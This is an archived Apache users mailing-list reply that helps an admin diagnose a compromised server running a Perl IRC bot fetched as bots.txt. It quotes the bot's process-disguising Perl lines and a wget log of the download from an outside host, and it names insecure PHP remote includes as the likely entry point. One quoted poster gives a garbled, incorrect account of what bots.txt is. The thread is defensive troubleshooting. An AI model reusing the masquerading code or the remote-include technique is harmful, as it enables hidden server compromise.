Re: [users@httpd] Please help... apache hacked?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Ricardo Kleemann schrieb:

does ANYBODY even know what bots.txt even DOES?

bots.txt should look like this:

accept all
reject altaVista

look at virussin.com/bots.txt to see what it SHOULD do... its for
SEARCH EINGINES. the bot grabs it, looks at it, and it its on the
white list of eingines, it caches the site, if its on the blacklist
(reject), it sulks away into a corner...


This particular bots.txt is downloaded from tehboob.be and then is run (somehow) from /.

This bots.txt is a perl program that connects to irc servers and sends out apache access_log information.

I don't think it sends access_log information. The open file handles for "access_log" you mentioned has been inherited from the parent Apache process.


A few other clues... when I run ps, it shows the processes as "syslogd -m 0", but really when looked at with the "real" name it simply shows perl. It's just running the perl interpreter as nobody (since apache runs as nobody). When I look at lsof, it shows that the cwd is /. So how apache is able to download a program, and run it, from /, I don't understand.

Thats exactly what bots.txt does:

my $processo = 'syslogd -m 0';
chdir("/");
$0="$processo"."\0"x16;;


How can I block apache from being able to do such a thing? Again, here's the output from the error_log that shows the download happening, and then I have no idea how, after downloaded, the program is run.

I expect that you are using an insecure php-configuration allowing include() to fetch php-scripts via HTTP (allow_url_fopen) and executing commands via the php-functions exec, system, popen, passthrugh ..

That may be the way how a foreign attacker invoke the perl interpreter on you machine.


--11:51:13--  http://tehboob.be/bots.txt
          => `bots.txt'
Resolving tehboob.be... done.
Connecting to tehboob.be[72.20.8.243]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,378 [text/plain]

0K .......... .......... ........ 100% 683.08 KB/s

My guess is that maybe the hackers installed a program that is performing this download. But I've searched the joomla installation for any file containing "bots.txt" to no success.




Can someone explain why this is logged in the error_log and not in the access_log?

Wget writes status information when retrieving files to STDERR and so they get passed to the error_log.


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx



[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux